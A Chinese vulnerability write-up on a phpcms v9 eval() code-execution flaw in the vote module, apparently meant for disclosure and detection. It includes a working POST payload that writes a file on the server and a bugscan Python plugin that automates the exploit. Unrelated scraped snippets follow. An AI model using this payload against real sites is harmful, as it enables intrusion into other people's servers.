phpcms前台任意代码执行漏洞(php<5.3)

phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞

/phpsso_server/phpcms/libs/functions/global.func.php



/**

* 将字符串转换为数组

*

* @param    string    $data    字符串

* @return    array    返回数组格式,如果,data为空,则返回空数组

*/

function string2array($data) {

if($data == '''') return array();

eval("\$array = $data;");

return $array;

}

在文件/phpcms/modules/vote/index.php中,我们找到它的执行流程



/**

* 处理投票

*/

public function post(){

$subjectid = intval($_POST[''subjectid'']);

if(!$subjectid)    showmessage(L(''vote_novote''),''blank'');

//当前站点

$siteid = SITEID;

//判断是否已投过票,或者尚未到第二次投票期

$return = $this->check($subjectid);

switch ($return) {

case 0:

  showmessage(L(''vote_voteyes''),"?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");

  break;

case -1:

  showmessage(L(''vote_voteyes''),"?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");

  break;

}

if(!is_array($_POST[''radio''])) showmessage(L(''vote_nooption''),''blank'');

    $time = SYS_TIME;

   $data_arr = array();

  foreach($_POST[''radio''] as $radio){  //接收POST传递的radio并转换为$radio数组

  $data_arr[$radio]=''1'';

  }

  $new_data = array2string($data_arr);//转成字符串存入数据库中  

  //添加到数据库

$this->vote_data->insert(array(''userid''=>$this->userid,''username''=>$this->username,''subjectid''=>$subjectid,''time''=>$time,''ip''=>$this->ip,''data''=>$new_data));

//把字符串$new_data放到data里面

//查询投票奖励点数,并更新会员点数

$vote_arr = $this->vote->get_one(array(''subjectid''=>$subjectid));

  pc_base::load_app_class(''receipts'',''pay'',0);

receipts::point($vote_arr[''credit''],$this->userid, $this->username, '''',''selfincome'',L(''vote_post_point''));

//更新投票人数

$this->vote->update(array(''votenumber''=>''+=1''),array(''subjectid''=>$subjectid));

showmessage(L(''vote_votesucceed''), "?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");

}

/**

*

* 投票结果显示

*/

public function result(){

$siteid = SITEID;

$subjectid = abs(intval($_GET[''subjectid'']));

if(!$subjectid)    showmessage(L(''vote_novote''),''blank'');

//取出投票标题

$subject_arr = $this->vote->get_subject($subjectid);

if(!is_array($subject_arr)) showmessage(L(''vote_novote''),''blank'');

extract($subject_arr);

//获取投票选项

$options = $this->vote_option->get_options($subjectid);

//新建一数组用来存新组合数据

        $total = 0;

        $vote_data =array();

$vote_data[''total''] = 0 ;//所有投票选项总数

$vote_data[''votes''] = 0 ;//投票人数

//获取投票结果信息

        $infos = $this->vote_data->select(array(''subjectid''=>$subjectid),''data'');

//循环每个会员的投票记录

foreach($infos as $subjectid_arr) {

extract($subjectid_arr);

$arr = string2array($data);//调用了string2array进入eval函数

foreach($arr as $key => $values){

$vote_data[$key]+=1;

}

$total += array_sum($arr);

$vote_data[''votes'']++ ;

}

$vote_data[''total''] = $total ;

//SEO设置

$SEO = seo(SITEID, '''', $subject, $description, $subject);

   include template(''vote'',''vote_result'');

}

所以执行的过程就是

1.首先找到一个可以投票的id参数subjectid

2.发起投票,post数据



/index.php?m=vote&c=index&a=post&subjectid=xxx&siteid=1

subjectid=1&radio[]=);fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),"vulnerable test");

3.然后我们再查看result,触发string2array函数



/index.php?m=vote&c=index&a=result&subjectid=xxx&siteid=1

4.再看看是否有readme.php文件存在。

附上一个用于bugscan检测脚本

Python



# !/usr/bin/dev python

# -*- coding:utf-8 -*-

 

import re

import urllib

import urllib2

 

 

def get_vote_links(args):

    vul_url = args

    vote_url = ''%sindex.php?m=vote'' % vul_url

    code, head, res, _, _ = curl.curl(vote_url)

    ids = []

    for miter in re.finditer(r''<a href=.*?subjectid=(?P<id>\d+)'', res, re.DOTALL):

        ids.append(miter.group(''id''))

    if len(ids) == 0:

        return None

 

    return list(set(ids))

 

 

def assign(service, args):

    if service == ''phpcms'':

        return True, args

    pass

 

 

def audit(args):

    vul_url = args

    ids = get_vote_links(args)

    if ids:

        for i in ids:

            exploit_url = ''%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1'' % (vul_url, i)

            payload = {''subjectid'': 1,

                       ''radio[]'': '');fputs(fopen(base64_decode(YnVnc2Nhbi5waHA=),w),"vulnerable test");''}

            post_data = urllib.urlencode(payload)

            curl.curl(''-d "%s" %s'' % (post_data, exploit_url))

            verify_url = ''%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1'' % (vul_url, i)

            curl.curl(verify_url)

            shell_url = ''%sbugscan.php'' % vul_url

            code, head, res, _, _ = curl.curl(shell_url)

            if code == 200 and ''vulnerable test'' in res:

                security_hole(vul_url)

    pass

 

 

if __name__ == "__main__":

    from dummy import *

    audit(assign(''phpcms'', ''http://www.example.com/'')[1])

 

你可能感兴趣的:(phpcms)

  • phpcms v9敏感词内容替换 大海哪蓝 PHPCMSphp
    后台先在"扩展"——>"敏感词管理"中添加敏感词,然后修改phpcms\modules\content\content.php文件来实现添加或者编辑内容时敏感词的替换。(如果涉及会员投稿和留言等,也需要在对应模块中做类似处理)在add方法和edit方法中if(trim($_POST['info']['title'])=='')showmessage(L('title_is_empty'));下方添
  • 解决phpcms搜索列表页:跳转错误 about:blank#blocked 草巾冒小子 phpcms踩坑篇
    phpcms搜索列表页:跳转错误about:blank#blocked其他页面没发现有类似问题;仅仅在文章内容页点击文章tag关键词标签的时候,发现关键词返回的数据列表页(即模板文件content/tag_list.html)内部的:首页、网站logo的链接都无法执行返回首页,而是跳转到链接页面地址:about:blank#blocked;截图说明:代码·修改之前:{pc:contentactio
  • PHPCMS V9数据库中v9_poster_“日期”表(如,v9_poster_201010等)是什么表,有什么用,怎么按日期生成的? 大海哪蓝 PHPCMSv9_poster_2019
    v9_poster_“日期”这些表和其中的数据记录是网站中广告展示和点击时生成的如果在网站模板中使用了诸如这样的方式调用广告,就会有新的表或者新的数据记录产生,日积月累造成数据库体积非常大。如果客户不需要统计广告访问的数据,可以按如下方法去除创建表和插入数据的功能(当然已经产生的表可以删除):打开phpcms\modules\poster\index.php文件,搜索关键字“s_db”,将含该关键
  • PHPCMS V9手机移动端(支持单图和多图)图片上传,(PHPCMS V9前台使用layui的上传组件代替默认的SWFupload上传图片) 大海哪蓝 PHPCMS
    默认phpcms的上传图片使用的是swfupload,导致手机移动端上传图片无法使用。这里我们使用layui的上传组件来使其支持手机移动端(支持单图和多图)图片上传,效果图如下:实现步骤:一、打开phpcms\modules\attachment\attachments.php文件,新增如下函数:publicfunctionimgupload(){pc_base::load_sys_class('
  • PHPCMS V9编辑器中新增上传视频(上传视频并插入HTML5的video标签)的功能 大海哪蓝 PHPCMS
    由于PHPCMSv9默认的编辑器中上传的视频插入的是embed标签使用的是flash播放器,手机端无法播放,所以来改造下,让其上传视频并插入HTML5的video标签,这样电脑端的主流浏览器和手机端能都播放,当然也可以参考本文修改进而支持ckplayer、cuplayer等播放器。修改步骤(为防止与其它按钮混淆和去除无用插件,这里去除了原编辑器中插入flash和视频的按钮):一、打开statics
  • phpcms微信支付-PHPCMS V9支付模块调整及新增微信支付(含电脑端微信扫码支付和微信公众号JSAPI支付及手机浏览器端微信H5支付) 大海哪蓝 PHPCMS微信公众号开发PHP+MYSQLPHPCMS微信支付PHPCMS微信扫码支付PHPCMS微信公众号支付PHPCMSV9微信支付phpcms微信支付插件
    研究过PHPCMS支付模块的朋友应该知道,PHPCMS自带的支付模块局限性比较明显,本次新增的微信支付,在一定程度上修改和完善了PHPCMSV9原有的支付模块及相关文件,重写了支付宝支付类,新增了电脑端微信扫码支付类和微信公众号JSAPI支付类文件及手机浏览器端微信H5支付类文件,新增了系统类文件和一些函数。在扩展函数库文件中新增了判断手机和判断微信的函数。注:调整后的支付模块,也可以方便对接其它
  • PHPCMS V9使用ajax方式提交表单 大海哪蓝 PHPCMS
    页面效果:实现步骤:一、前台模板(注:需要引入jquery文件)functionformsubmit(){varyemail=$('#yemail').val();if(yemail==''){$(".newsletter-error").html("邮箱不能为空!").fadeIn().delay(3000).fadeOut();returnfalse;}if(!yemail.match(/^(
  • PHPCMS V9后台表单向导用户提交的信息新增“修改”的功能 大海哪蓝 PHPCMS
    默认PHPCMSV9后台"表单向导"——>表单"信息列表"中只能查看和删除用户提交的信息,这里新增“修改”的功能。本次新增的表单信息“修改”功能来源于系统本身自带的模型字段缓存技术。表单种类的多少、每个表单中字段的多少和字段类型对本功能无影响。如果表单中有新增或者修改的字段,需要在后台“更新缓存”。效果图:操作步骤:(新增或者修改的部分已标出)一、表单信息列表后台模板文件:phpcms\modul
  • PHPCMS V9 更改分页页码显示个数 大海哪蓝 PHPCMSPHPCMS分页PHPCMS页码显示个数
    先看更改前后的效果(注:以下效果中将默认的分页样式做了美化,不影响本次修改):修改前效果:修改后效果:修改方法如下:打开phpcms\libs\functions\global.func.php,找到分页函数functionpages,将原来默认的参数$setpages=10修改为$setpages=3
  • PHPCMS栏目管理中添加栏目图组(栏目多图上传) 大海哪蓝 PHPCMSPHPCMS栏目组图PHPCMS栏目多图功能
    之前发表过一篇《PHPCMSV9单页面添加组图字段》的文章,是在后台添加或编辑单页面内容处增加图组功能,然后前台单页面调用图组。今天要说的是在栏目管理处,也就是添加或修改栏目时,有上传栏目图组的功能。两者都源自系统本身的图组,实现上有类似的地方。实现流程:一、栏目表中添加栏目多图字段二、系统扩展函数文件phpcms/libs/functions/extention.func.php中添加函数cat
  • PHPCMS V9频道页循环子栏目内容(子栏目为单页则输出标题和内容,为列表则输出栏目名称和分页列表) 大海哪蓝 PHPCMS
    注意:频道下的子栏目最多只能有一个分页列表栏目(否则分页会有问题),单页面不限。效果如下图:频道页模板如下:{loopsubcat($catid)$r}{if$r[ismenu]}{if$r[type]==1}{pc:getsql="SELECT*FROM`wysys_page`wherecatid=$r[catid]"}{loop$data$rp}{$rp[title]}{$rp[content
  • PHPCMS V9单页面添加组图字段 大海哪蓝 PHPCMS
    言:写单页面多图上传前,先看了别人写的单页面单图上传:给单页page自定义单图字段,方便图片的上传1、打开数据库,找到v9_page表,添加一个图片的字段:catpic类型varchar,长度100,当然也可以不用进行设置。2、打开phpcms\modules\content\templates\content_page.tpl.php文件,在48行下面插入如下代码:组图3、4步骤看下面截图部分更
  • PHPCMS V9任意页面调用分页 大海哪蓝 PHPCMS
    {pc:getsql="SELECTb.catid,b.title,b.updatetimeFROM`v9_hits`a,`v9_news`bwhereconcat('c-1-',b.id)=a.hitsidorderbyinputtimedesc"page="$page"num="8"return="data"}{loop$data$r}{iftime()-$r[updatetime]{/if}
  • PHPCMS V9循环调用指定栏目下的所有单页信息 大海哪蓝 PHPCMS
    {loopsubcat(1)$ck$carr}{pc:getsql="SELECT*FROMv9_pagewherecatid=$ck"}{loop$data$r}{str_cut(strip_tags($r[content]),400,"……")}{/loop}{/pc}{$carr['catid']}_{$carr[catname]}{/loop}
  • PHPCMS V9后台表单向导中让“信息列表"页面直接显示用户留言的信息列表 大海哪蓝 PHPCMS
    一、找到后台表单信息列表对应的控制器phpcms\modules\formguide\formguide_info.php文件,添加如图所示代码:/*WYADDAT2017-09-25后台表单向导中信息列表直接显示用户留言信息列表*/pc_base::load_sys_class('form','','');define('CACHE_MODEL_PATH',PHPCMS_PATH.'caches
  • phpcmsv9前台按子管理员名称分页展示子管理员的文章 大海哪蓝 PHPCMSphpphpcmsv9按子管理员名调用文章
    一、系统扩展函数文件phpcms\libs\functions\extention.func.php中添加函数:/**@param$roleid当前管理员角色ID*@param$uid当前管理员角色ID**/functionget_username_from_tit($title){$userlist=pc_base::load_model('admin_model');$userinfo=$us
  • phpcms v9外链文章获取点击量 大海哪蓝 PHPCMS前端phpjavascript
    默认phpcmsv9的外链文章因为直接跳转(不进入详情页模板),导致外链文章的点击量一直是0,而我们有时需要按点击量排行或者排序的时候,就有问题了。这里我们借助系统自带的点击量接口api来获取:一、前台JS部分添加://点击外链执行文章点击量增加$(".out_link").click(function(){$.get('api.php?op=count',{'id':$(this).attr("
  • phpcms v9未审核推荐信息出现在推荐列表中【BUG修复】 大海哪蓝 PHPCMSbugphp
    修改文件:phpcms/modules/content/class/content_tag.class.php调整过的方法:publicfunction__construct(){$this->db=pc_base::load_model('content_model');$this->position=pc_base::load_model('position_model');$this->po
  • PHPCMS表单部分设置 木宇尘star
    姓名*电话*留言*后台表单需添加name,phone,liuyan三个字段
  • dedecms织梦转免费CMS操作步骤(转PageAdmin,帝国CMS、PHPCMS、JTBC、PHPCMS、wordpress) HENRYLUKCY cmsphp
    dedecms织梦开始正式收费,授权5800元,对于草根站长来说真是太高了,最好的办法是转成免费开源的CMS,下面一些经验之谈,dedecms织梦转PageAdmin,帝国CMS、PHPCMS、JTBC、PHPCMS、wordpress都是通用的操作步骤:1.首先我们先给现有的织梦CMS网站做个完整备份,网站程序+数据库备份。2.新CMS程序创建(以帝国为例)3.创建栏目对应dede栏目(防止出现
  • phpcms v9后台添加草稿箱功能 大海哪蓝 PHPCMSphpphpcmsv9添加草稿箱功能
    一、后台添加文章模板phpcms/modules/content/templates/content_add.tpl.php中94行增加”保存草稿“按钮:"type="submit"name="dosubmit_draft"class="cu"style="width:100px;"onclick="refersh_window()">二、后台添加文章控制器phpcms/modules/conte
  • phpcms修改默认后台登录地址 Newbie@man 后端/PHP开发php
    PHPCMS后台入口都是统一的,为了安全起见需要更改后台登陆地址,一个需要更改登陆文件一个需要更改登陆方法login更改为xx_login(可以自定义)1修改./admin.phpheader('location:index.php?m=admin');?>改为:然后再把admin.php换个名字,例如xx_admin.php,但是用phpcms的人都知道index.php?m=admin&c=i
  • selinux下踩phpcms和mysql的坑 西湖章
    最近在弄一个小网站。上次弄网站差不多是10年前了,那时还是jsp。现在新增一个现有网站的英文版本,要部署到其他人的机器上,用的是phpcmsv9。年前提前放了3天假,在家折腾了2天多,基本上在测试机器上弄得差不多了。上班后又整理了下,准备弄到已有公网IP的机器上,它上面已经安装了lampp,别人在用mysql,没有用httpd。用系统的mysql,用lampp的httpd。坑1:由于是公网机器,我
  • 信息收集 - 网站敏感信息 狗蛋的博客之旅 Web安全渗透web安全安全
    CMS指纹信息:CMS(内容管理系统)又称为整站系统或文章系统,用于网站内容管理。用户只需要下载对应的CMS软件包,就能部署搭建,并直接利用CMS。但是各种CMS都具有其独特的结构命名规则和特定的文件内容,因此可以利用这些内容来获取CMS站点的具体软件CMS与版本。通过识别CMS指纹信息,可以帮助判断目标网站所使用的具体CMS。常见的CMS包括Discuz、Dedecms(织梦)、PhpCMS、W
  • 信息收集----CMS指纹识别 jjj34 web相关网络安全
    一.什么是指纹识别通过关键特征,识别出目标的CMS系统,服务器,开发语言,操作系统,CDN,WAF的类别版本等等1.识别对象1.CMS信息:比如Discuz,织梦,帝国CMS,PHPCMS,ECshop等2.前端技术:比如HTML5,jquery,bootstrap,Vue,ace等3.开发语言:PHP,Java,Ruby,C#,python等4.Web服务器:Apache,Nginx,IIS,l
  • php cms 代码注入,PHPCMS全版本通杀SQL注入漏洞 AMAX杨威 phpcms代码注入
    漏洞分析首先看下面的代码/phpcms/modules/member/content.php202行edit函数[php]publicfunctionedit(){$_username=$this->memberinfo['username'];if(isset($_POST['dosubmit'])){$catid=$_POST['info']['catid']=intval($_POST['i
  • phpcms v9后台二开三级联动菜单的调用方法 青茶360 phpcmsphp开发语言phpcms三级联动
    前台调用联动和后台内容模型里调用联动,只需要在模型字段设置里面选择联动菜单类型设置即可,这里就不讲这个用法了,我这里讲的是后台二开的时候表单用到联动菜单地区怎么加上这个功能。联动菜单地区:后台->扩展->联动菜单调用代码:{menu_linkage(1,'L_1')}1.后台二开表单地区联动菜单代码::后台表单地区效果图:2.表单提交后,但是存储的地区数据是一串数字1234,列表显示是数字怎么办?
  • NSS [鹏城杯 2022]压缩包 Jay 17 CTF-web(零散wp合集)网络安全web安全网络安全压缩包代码审计
    NSS[鹏城杯2022]压缩包考点:条件竞争/逻辑漏洞(解压失败不删除已经解压文件)参考:回忆phpcms头像上传漏洞以及后续影响|离别歌(leavesongs.com)源码有点小多open($filename);$dir=$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename);if(!is_dir($dir)){mkdir($dir)
  • 分享Python采集的77个PHP整站程序源码 zdh13370188237 php数据库开发语言
    Python采集的77个PHP整站程序源码下载链接:百度网盘请输入提取码提取码:pdwaULCms(UnlimitedCms)V1.0RCBuild20080926DiY-Page自定制系统V5.3公测版与非ITPhpcms网站管理系统2007SP6繁体中文UTF-8版Build20080805SupeSite6.0之Qinzhou.Cc模板LazyCMS内容管理系统V1.1.0.0702织梦内容
  • 获取webshell的方法 Redmaple925 渗透测试网络安全渗透测试获取webshellCMS
    获取webshell的方法CMS获取webshell通过搜索引擎搜索CMS网站程序名称phpcms拿Webshell、WordPress后台拿Webshell等非CMS获取webshell1、数据库备份获取webshell1、上传图片木马并获取上传后图片访问地址2、利用后台数据库备份方法,备份图片木马,并重命名(名称+后缀),获取访问地址3、访问备份木马文件,获取webshell2、抓包获取web
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他